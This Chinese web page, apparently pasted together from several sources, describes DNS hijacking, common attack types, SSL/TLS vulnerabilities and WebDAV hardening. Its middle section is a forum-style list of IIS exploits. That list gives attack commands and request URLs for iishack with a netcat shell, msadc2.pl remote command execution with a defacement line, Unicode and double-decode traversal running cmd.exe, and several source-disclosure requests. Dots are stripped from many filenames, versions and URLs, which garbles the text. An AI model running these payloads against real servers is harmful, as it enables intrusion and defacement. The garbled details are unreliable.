利用binddns漏洞攻击的分类,第1张

利用bind/dns漏洞攻击的分类包括以下几种:

1、DNS路由器是域服务提供商用来将域名与其对应的IP地址进行匹配的硬件设备。大多数路由器都带有预设密码和许多固件漏洞

网络罪犯可以利用薄弱的默认密码和漏洞来接管路由器并重新配置DNS设置以从中受益。如果他们成功覆盖了DNS路由器,则可以轻松地将流量转移到另一个网站,并阻塞您公司的网站,使其无法访问。

2、攻击者将目标锁定并拦截网站流量之间的通信,并且网站的DNS更改DNS设置,从而将流量定向到恶意IP地址。

3、本地DNS攻击会将恶意软件安装在网站用户的计算机上。该恶意软件通常是伪装成合法软件的特洛伊木马恶意软件,它使网络窃贼可以访问用户的网络系统,从而使他们能够窃取数据并更改DNS设置以将用户定向到恶意网站。

4、恶意DNS服务器,在这种类型的DNS劫持中,网络罪犯会拦截DNS服务器并更改DNS设置以将流量转移到虚假网站。

漏洞攻击原因分析:

DNS可能由于多种原因而被黑客入侵。劫机者可能会使用它进行欺骗,即向用户显示广告以产生收入或网络钓鱼,这会将用户定向到您网站的伪造版本,目的是窃取数据或登录信息。

Internet服务提供商(ISP)使用域重定向来控制用户的DNS查询以收集用户数据。其他组织使用域劫持进行审查或将用户重定向到备用。

DNS中的漏洞可能会导致用户丢失,黑客访问用户凭据,内容不可用以及用户沮丧等。DNS劫持或用户重定向攻击是域服务器突破性攻击的一种常见类型,其针对网络域服务器系统稳定性中的漏洞。 

1、DoS和DDoS攻击

DoS是Denial of

Service的简称,即拒绝服务。单一的DoS攻击一般是采用一对一方式的,通过制造并发送大流量无用数据,造成通往被攻击主机的网络拥塞,耗尽其服务资源,致使被攻击主机无法正常和外界通信。

DDos全称Distributed Denial of Service,分布式拒绝服务攻击。攻击者可以伪造IP 地址,间接地增加攻击流量。通过伪造源 IP

地址,受害者会误认为存在大量主机与其通信。黑客还会利用IP 协议的缺陷,对一个或多个目标进行攻击,消耗网络带宽及系统资源,使合法用户无法得到正常服务。

2、MITM攻击

中间人类型的网络攻击是指网络安全漏洞,使得攻击者有可能窃听两个人、两个网络或计算机之间来回发送的数据信息。在MITM攻击中,所涉及的两方可能会觉得通信正常,但在消息到达目的地之前,中间人就非法修改或访问了消息。

3、网络钓鱼攻击

网络钓鱼是通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾邮件,意图引诱收信人给出敏感信息的一种攻击方式。

攻击者可能会将自己伪装成网络银行、在线零售商和信用卡公司等可信的品牌,骗取用户的私人信息。最常见的是向用户发送链接,通过欺骗用户下载病毒等恶意软件,或提供私人信息来完成诈骗。在许多情况下,目标可能没有意识到他们已被入侵,这使得攻击者可以在没有任何人怀疑恶意活动的情况下获取同一组织中更多的相关信息。

在打开的电子邮件类型和单击的链接时要格外留意电子邮件标题,检查回复和返回路径的参数。不要点击任何看起来可疑的东西,也不要在网上留下可以证明自己身份的任何资料,包括手机号码、身份证号、银行卡号码等。

4、鲸鱼网络钓鱼攻击

之所以如此命名,是因为它针对的是组织的大鱼。通常包括最高管理层或其他负责组织的人,这些人掌握着企业或其运营的专有信息,更有可能为了买断信息而支付赎金。

鲸鱼网络钓鱼攻击可以通过采取相同的预防措施来避免攻击,例如仔细检查电子邮件及其随附的附件和链接,留意可疑的目的地或参数。

5、鱼叉式网络钓鱼攻击

鱼叉式网络钓鱼攻击是指一种有针对性的网络钓鱼攻击,攻击者花时间研究他们的预期目标,通过编写与目标相关性极强的消息来完成攻击。通常鱼叉式网络钓鱼攻击使用电子邮件欺骗,电子邮件发送人可能是目标信任的人,例如社交网络中的个人、密友或商业伙伴,使得受害者难以发觉。

6、勒索软件

勒索软件是一种流行的木马,通过骚扰、恐吓甚至采用绑架用户文件等方式,使用户数据资产或计算资源无法正常使用,并以此为条件向用户勒索钱财。这类用户数据资产包括文档、邮件、数据库、源代码、、压缩文件等多种文件。赎金形式包括真实货币、比特币或其它虚拟货币。

7、密码攻击

密码是大多数人访问验证的工具,因此找出目标的密码对黑客来说非常具有吸引力。攻击者可能试图拦截网络传输,以获取未经网络加密的密码。他们通过引导用户解决看似重要的问题来说服目标输入密码。

一些安全性较低的密码很容易被攻击者获取,例如“1234567”。此外,攻击者还经常使用暴力破解方法来猜测密码,即使用有关个人或其职位的基本信息来尝试猜测他们的密码。例如,通过组合用户的姓名、生日、周年纪念日或其他个人信息破译密码。

8、SQL注入攻击

SQL注入攻击是指后台数据库操作时,如果拼接外部参数到SQL语句中,就可能导致欺骗服务器执行恶意的SQL语句,造成数据泄露、删库、页面篡改等严重后果。按变量类型分为:数字型、字符型;按HTTP提交方式分为:GET注入、POST注入、cookie注入;按注入方式可分为:报错注入、盲注、堆叠注入等等。

SSL/TLS漏洞目前还是比较普遍的,首先关闭协议:SSL2、SSL3(比较老的SSL协议)配置完成ATS安全标准就可以避免以下的攻击了,最新的服务器环境都不会有一下问题,当然这种漏洞都是自己部署证书没有配置好导致的。

Export 加密算法

Export是一种老旧的弱加密算法,是被美国法律标示为可出口的加密算法,其限制对称加密最大强度位数为40位,限制密钥交换强度为最大512位。这是一个现今被强制丢弃的算法。

Downgrade(降级攻击)

降级攻击是一种对计算机系统或者通信协议的攻击,在降级攻击中,攻击者故意使系统放弃新式、安全性高的工作方式,反而使用为向下兼容而准备的老式、安全性差的工作方式,降级攻击常被用于中间人攻击,讲加密的通信协议安全性大幅削弱,得以进行原本不可能做到的攻击。 在现代的回退防御中,使用单独的信号套件来指示自愿降级行为,需要理解该信号并支持更高协议版本的服务器来终止协商,该套件是TLS_FALLBACK_SCSV(0x5600)

MITM(中间人攻击)

MITM(Man-in-the-MiddleAttack) ,是指攻击者与通讯的两端分别创建独立的联系,并交换其所有收到的数据,使通讯的两端认为他们正在通过一个私密的连接与对方直接对话,但事实上整个对话都被攻击者完全控制,在中间人攻击中,攻击者可以拦截通讯双方的通话并插入新的内容。一个中间人攻击能成功的前提条件是攻击者能够将自己伪装成每个参与会话的终端,并且不被其他终端识破。

BEAST(野兽攻击)

BEAST(CVE-2011-3389) BEAST是一种明文攻击,通过从SSL/TLS加密的会话中获取受害者的COOKIE值(通过进行一次会话劫持攻击),进而篡改一个加密算法的 CBC(密码块链)的模式以实现攻击目录,其主要针对TLS10和更早版本的协议中的对称加密算法CBC模式。

RC4 加密算法

由于早期的BEAST野兽攻击而采用的加密算法,RC4算法能减轻野兽攻击的危害,后来随着客户端版本升级,有了客户端缓解方案(Chrome 和 Firefox 提供了缓解方案),野兽攻击就不是什么大问题了。同样这是一个现今被强制丢弃的算法。

CRIME(罪恶攻击)

CRIME(CVE-2012-4929),全称Compression Ratio Info-leak Made Easy,这是一种因SSL压缩造成的安全隐患,通过它可窃取启用数据压缩特性的HTTPS或SPDY协议传输的私密Web Cookie。在成功读取身份验证Cookie后,攻击者可以实行会话劫持和发动进一步攻击。

SSL 压缩在下述版本是默认关闭的: nginx 116及更高/109及更高(如果使用了 OpenSSL 100及更高), nginx 132及更高/122及更高(如果使用较旧版本的 OpenSSL)。

如果你使用一个早期版本的 nginx 或 OpenSSL,而且你的发行版没有向后移植该选项,那么你需要重新编译没有一个 ZLIB 支持的 OpenSSL。这会禁止 OpenSSL 使用 DEFLATE 压缩方式。如果你禁用了这个,你仍然可以使用常规的 HTML DEFLATE 压缩。

Heartbleed(心血漏洞)

Heartbleed(CVE-2014-0160) 是一个于2014年4月公布的 OpenSSL 加密库的漏洞,它是一个被广泛使用的传输层安全(TLS)协议的实现。无论是服务器端还是客户端在 TLS 中使用了有缺陷的 OpenSSL,都可以被利用该缺陷。由于它是因 DTLS 心跳扩展(RFC 6520)中的输入验证不正确(缺少了边界检查)而导致的,所以该漏洞根据“心跳”而命名。这个漏洞是一种缓存区超读漏洞,它可以读取到本不应该读取的数据。如果使用带缺陷的Openssl版本,无论是服务器还是客户端,都可能因此受到攻击。

POODLE漏洞(卷毛狗攻击)

2014年10月14号由Google发现的POODLE漏洞,全称是Padding Oracle On Downloaded Legacy Encryption vulnerability,又被称为“贵宾犬攻击”(CVE-2014-3566),POODLE漏洞只对CBC模式的明文进行了身份验证,但是没有对填充字节进行完整性验证,攻击者窃取采用SSL30版加密通信过程中的内容,对填充字节修改并且利用预置填充来恢复加密内容,以达到攻击目的。

TLS POODLE(TLS卷毛狗攻击)

TLS POODLE(CVE-2014-8730) 该漏洞的原理和POODLE漏洞的原理一致,但不是SSL3协议。由于TLS填充是SSLv3的一个子集,因此可以重新使用针对TLS的POODLE攻击。TLS对于它的填充格式是非常严格的,但是一些TLS实现在解密之后不执行填充结构的检查。即使使用TLS也不会容易受到POODLE攻击的影响。

CCS

CCS(CVE-2014-0224) 全称openssl MITM CCS injection attack,Openssl 098za之前的版本、100m之前的以及101h之前的openssl没有适当的限制ChangeCipherSpec信息的处理,这允许中间人攻击者在通信之间使用0长度的主密钥。

FREAK

FREAK(CVE-2015-0204) 客户端会在一个全安全强度的RSA握手过程中接受使用弱安全强度的出口RSA密钥,其中关键在于客户端并没有允许协商任何出口级别的RSA密码套件。

Logjam

Logjam(CVE-2015-4000) 使用 Diffie-Hellman 密钥交换协议的 TLS 连接很容易受到攻击,尤其是DH密钥中的公钥强度小于1024bits。中间人攻击者可将有漏洞的 TLS 连接降级至使用 512 字节导出级加密。这种攻击会影响支持 DHE_EXPORT 密码的所有服务器。这个攻击可通过为两组弱 Diffie-Hellman 参数预先计算 512 字节质数完成,特别是 Apache 的 httpd 版本 215 到 247,以及 OpenSSL 的所有版本。

DROWN(溺水攻击/溺亡攻击)

2016年3月发现的针对TLS的新漏洞攻击——DROWN(Decrypting RSA with Obsolete and Weakened eNcryption,CVE-2016-0800),也即利用过时的、弱化的一种RSA加密算法来解密破解TLS协议中被该算法加密的会话密钥。 具体说来,DROWN漏洞可以利用过时的SSLv2协议来解密与之共享相同RSA私钥的TLS协议所保护的流量。 DROWN攻击依赖于SSLv2协议的设计缺陷以及知名的Bleichenbacher攻击。

通常检查以下两点服务器的配置

服务器允许SSL2连接,需要将其关闭。

私钥同时用于允许SSL2连接的其他服务器。例如,Web服务器和邮件服务器上使用相同的私钥和证书,如果邮件服务器支持SSL2,即使web服务器不支持SSL2,攻击者可以利用邮件服务器来破坏与web服务器的TLS连接。

Openssl Padding Oracle

Openssl Padding Oracle(CVE-2016-2107) openssl 101t到openssl 102h之前没有考虑某些填充检查期间的内存分配,这允许远程攻击者通过针对AES CBC会话的padding-oracle攻击来获取敏感的明文信息。

强制丢弃的算法

aNULL 包含了非验证的 Diffie-Hellman 密钥交换,这会受到中间人(MITM)攻击

eNULL 包含了无加密的算法(明文)

EXPORT 是老旧的弱加密算法,是被美国法律标示为可出口的

RC4 包含的加密算法使用了已弃用的 ARCFOUR 算法

DES 包含的加密算法使用了弃用的数据加密标准(DES)

SSLv2 包含了定义在旧版本 SSL 标准中的所有算法,现已弃用

MD5 包含了使用已弃用的 MD5 作为哈希算法的所有算法

你说的漏洞比较广,是软件漏洞还是系统 系统漏洞还有server漏洞还有iis漏洞 我就和你说说iis漏洞吧。1 iis4hack缓冲溢出

主要存在于htr,idc和stm文件中,其对关于这些文件的URL请求没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序 在系统中下载和执行程序。要检测这样的站点你需要两个文件iishackexe,ncxexe,你可以到下面 的站点wwwtechnotroniccom去下载,另外你还需要一台自己的WEB服务器。你现在你自己的WEB服务器上运行WEB服务程序并把ncxexe放到你自己相应的目录下,然后使用iishackexe来检查目标机器:

c:>iishackexe <victim> 80 <your web server>/ncxexe

然后你就使用netcat来连接你要检测的服务器:

c:>nc <victim> 80

如果溢出点正确你就可以看到目标机器的命令行提示,并且是管理远权限。利用程序见iis4hackzip

2msadc

IIS的MDAC组件存在一个漏洞可以导致攻击者远程执行你系统的命令。主要核心问题是存在于RDS Datafactory,默认情况下, 它允许远程命令发送到IIS服务器中,这命令会以设备用户的身份运行,其一般默认情况下是SYSTEM用户。利用程序为msadc2pl,我们看看它的help

[quack@chat quack]$ perl msadc2pl -h

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

Usage: msadcpl -h <host> { -d <delay> -X -v }

-h <host> = host you want to scan (ip or domain)

-d <seconds> = delay between calls, default 1 second

-X = dump Index Server path table, if available

-N = query VbBusObj for NetBIOS name

-V = use VbBusObj instead of ActiveDataFactory

-v = verbose

-e = external dictionary file for step 5

-u <\hostsharefile> = use UNC file

-w = Windows 95 instead of Windows NT

-c = v1 compatibility (three step query)

-s <number> = run only step <number>

Or a -R will resume a (v2) command session

[quack@chat quack]$ perl msadc2pl -h http://wwwtargecom/

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

Type the command line you want to run (cmd /c assumed):

cmd /c

如果出现cmd /c后,直接键入命令行,就可以以system权限执行命令了。比如xundi教的:

echo hacked by me > d:inetpubwwwrootvictimwebindexhtm

3Codebrwsasp

察看文件源代码

http://wwwvictimcom/iisamples/exair/howitworks/codebrwsaspsource=/iisamples/exair/howitworks/codebrwsasp

4Showcodeasp

察看文件源代码

http://wwwvictimcom/msadc/samples/selector/showcodeaspsource=/msadc//////winnt/winini

5Nullhtw

察看文件源代码

http://wwwvictimcom/nullhtwCiWebhitsfile=/defaultasp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

6webhitsdll & htw

hit-highligting功能是由Index Server提供的允许一个WEB用户在文档上highlighted(突出)他们原始搜索的条目,这个文档的名字通过变量CiWebhitsfile传递给htw文件,Webhitsdll是一个ISAPI应用程序 来处理请求,打开文件并返回结果,当用户控制了CiWebhitsfile参数传递给htw时,他们就可以请求任意文件,结果就是导致查看ASP源码和其他脚本文件内容。要了解你是否存在这个漏洞,你可以请求如下条目:

http://wwwvictimcom/nosuchfilehtw 如果你从服务器端获得如下信息:

format of the QUERY_STRING is invalid这就表示你存在这个漏洞 这个问题主要就是webhitsdll关联了htw文件的映射,所以你只要取消

这个映射就能避免这个漏洞,你可以在你认为有漏洞的系统中搜索htw文件,一般会发现如下的程序:

/iissamples/issamples/oop/qfullhithtw

/iissamples/issamples/oop/qsumrhithtw

/isssamples/exair/search/qfullhithtw

/isssamples/exair/search/qsumrhithtw

/isshelp/iss/misc/iirturnhhtw (这个一般为loopback使用)

一个攻击者可以使用如下的方法来访问系统中文件的内容:

http://wwwvictimcom/iissamples/issamples/oop/qfullhithtw

ciwebhitsfile=///winnt/winini&cirestriction=none&cihilitetype=full

就会在有此漏洞系统中winini文件的内容。 7ASP Alternate Data Streams(::$DATA) 要查看一些asp文件的内容,你可以请求如下的URL: http://wwwvictimcom/defaultasp::$DATA你就得到了源代码

8ASP Dot Bug

在请求的URL结尾追加一个或者多个点导致泄露ASP源代码。

http://wwwvictimcom/sampleasp

9ISMDLL

这个漏洞是由Cerberus Information Security team最早发现的,它运行在IIS40和50上面,允许攻击者查看任意文件内容和源代码。通过在文件名后面追加近230个+或者%20(这些表示空格)并追加htr的特殊请求给IIS,会使IIS认为客户端请求的是htr文件,而htr文件的后缀映射到ISMDLL ISAPI应用程序,这样IIS就把这个htr请求转交给这个DLL文件,然后ISMDLL 程序把传递过来的文件打开和执行,但在ISMDLL 截断信息之前,缓冲区发送 一个截断开的 Htr 并会有一些时间去返回一些你要打开的文件内容 除非 WEB 服务停止并重启过,否则这攻击只能有效执行一次。如果已经发送过一个 htr 请求到机器上,那么这攻击会失效它只能在 ISMDLL第一次装入内存时工作CNNS发现追加+号到没有一次攻击这个问题,可以进行多次攻击。

http://wwwvictimcom/globalasa%20%20(<=230)globalasahtr

10 idc & ida Bugs

这个漏洞实际上类似ASP dot 漏洞,其能在IIS40上显示其WEB目录信息,很奇怪的说有些还在IIS50上发现过此类漏洞,通过增加idc或者ida 后缀到URL会导致IIS尝试允许通过数据库连接程序DLL来运行IDC,如果此idc不存在,它就返回一些信息给客户端。

http://wwwvictimcom/anythingidc 或者 anythingidq

11+htr Bug

对有些ASA和ASP追加+htr的URL请求就会导致文件源代码的泄露:

http://wwwvictimcom/globalasa+htr

12NT Site Server Adsamples

通过请求sitecsc,一般保存在/adsamples/config/sitecsc中,攻击者 可能获得一些如数据库中的DSN,UID和PASS的一些信息,如:

http://wwwvictimcom/adsamples/config/sitecsc

13/iisadmpwd

IIS40中包含一个有趣的特征就是允许远程用户攻击WEB服务器上的用户帐号,就是你的WEB服务器是通过NAT来转换地址的,还可以被攻击。 每个IIS40安装的时候建立一个虚拟目录/iisadmpwd,这个目录包含多个 htr文件,匿名用户允许访问这些文件,这些文件刚好没有规定只限制 在loopback addr(127001),请求这些文件就跳出对话框让你通过WEB来修改用户的帐号和密码。这个目录物理映射在下面的目录下:

c:winntsystem32inetsrviisadmpwd

Achghtr

Aexphtr

Aexp2htr

Aexp2bhtr

Aexp3htr

Aexp4htr

Aexp4bhtr

Anothtr

Anot3htr

这样,攻击者可以通过暴力来猜测你的密码。

14Translate:f Bug

泄露asp文件源代码 存在OFFICE 2000和FRONTPAGE 2000Server Extensions中的WebDAV中, 当有人请求一个ASP/ASA后者其他任意脚本的时候在HTTP GET加上Translate:f 后缀,并在请求文件后面加/就会显示文件代码,当然在没有打WIN2K SP1补丁 为前提。这个是W2K的漏洞,但由于FP2000也安装在IIS40上,所以在IIS40上也有这个漏洞。利用程序: trasn1pl,trans2pl

15Unicode

IIS 40和IIS 50在Unicode字符解码的实现中存在一个安全漏洞,导致用户可以远程通过IIS执行任意命令。当IIS打开文件时,如果该文件名包含unicode字符,它会对其进行解码,如果用户提供一些特殊 的编码,将导致IIS错误的打开或者执行某些web根目录以外的文件。

http://wwwvictimcom/scripts/%c1%1c/winnt/system32/cmdexe/c+dir

http://wwwvictimcom/scripts/%c0%af/winnt/system32/cmdexe/c+dir

http://wwwvictimcom/scripts/%c1%9c/winnt/system32/cmdexe/c+dir

http://wwwvictimcom/aasp/%c1%1c/%c1%1c/winnt/winini

可能需要察看以下几个目录

GET

/scripts/%c0%af%c0%af%c0%af%c0%af/winnt/system32/cmdexe/c+dir+c:\

HTTP/10rnrn

GET

/msadc/%c0%af%c0%af%c0%af/winnt/system32/cmdexe/c+dir+c:\

HTTP/10rnrn

GET

/_vti_bin/%c0%af%c0%af%c0%af/winnt/system32/cmdexe/c+dir+c:\

HTTP/10rnrn

GET

/_mem_bin/%c0%af%c0%af%c0%af/winnt/system32/cmdexe/c+dir+c:\

HTTP/10rnrn

GET

/cgi-bin/%c0%af%c0%af%c0%af/winnt/system32/cmdexe/c+dir+c:\

HTTP/10rnrn

eeye开发了工具包iishack15针对这一漏洞进行测试

16iis50 缓冲溢出

微软Win 2K IIS

5的打印ISAPI扩展接口建立了printer扩展名到msw3prtdll的映射关系,缺省情况下该映射存在。当远程用户提交对printer的URL请求时,IIS

5调用msw3prtdll解释该请求。由于msw3prtdll缺乏足够的缓冲区边界检查,远程用户可以提交一个精心构造的针对printer的URL请求,其"Host:"域包含大约420字节的数据,此时在msw3prtdll中发生典型的缓冲区溢出,潜在允许执行任意代码。溢出发生后,WEB服务停止响应,Win 2K可以检查到WEB服务停止响应,从而自动重启它,因此系统管理员很难意识到发生过攻击。利用程序见iis5hackzip

17IIS CGI文件名二次解码漏洞

IIS在加载可执行CGI程序时,会进行两次解码。第一次解码是对CGI文件名进行http解码,然后判断此文件名是否为可执行文件,例如检查后缀名是否为"exe"或"com"等等。在文件名检查通过之后,IIS会再进行第二次解码。正常情况下,应该只对该CGI的参数进行解码,然而,IIS错误地将已经解码过的CGI文件名和CGI参数一起进行解码。这样,CGI文件名就被错误地解码了两次。

通过精心构造CGI文件名,攻击者可以绕过IIS对文件名所作的安全检查,例如对"/"或"/"的检查,在某些条件下,攻击者可以执行任意系统命令。

例如,对于’’这个字符,正常编码后是%5c。这三个字符对应的编码为:

’%’ = %25

’5’ = %35

’c’ = %63

如果要对这三个字符再做一次编码,就可以有多种形式,例如:

%255c

%%35c

%%35%63

%25%35%63

因此,""就可以表示成"%255c"或"%%35c"等等形式。在经过第一次解码之后,变成"%5c"。IIS会认为这是一个正常的字符串,不会违反安全规则检查。而在第二次被解码之后,就会变成""。因此攻击者就可以使用""来进行目录遍历,执行web目录之外的任意程序。 好了 先到这里。。。。漏洞太多了不过还是微软系统排第一的 一个是使用的人群广 一个是XXX 哈哈哈

漏洞描述:目标服务器启用不安全的传输方法,如PUT、TRACE、DELETE、MOVE等,这可能在服务器上使用 WebDAV,由于DAV方法允许客户端操纵服务器上的文件,若没有合理配置dav,有可能允许未授权的用户利用其修改服务器上的文件。

解决方法:

(1)关闭不安全的传输方法,推荐POST、GET方法。

(2)如果服务器不需要支持 WebDAV,请务必禁用它。或者为允许webdav的目录配置严格的访问权限,如认证方法,认证需要的用户名,密码。

DABAN RP主题是一个优秀的主题,极致后台体验,无插件,集成会员系统
网站模板库 » 利用binddns漏洞攻击的分类

0条评论

发表评论

提供最优质的资源集合

立即查看 了解详情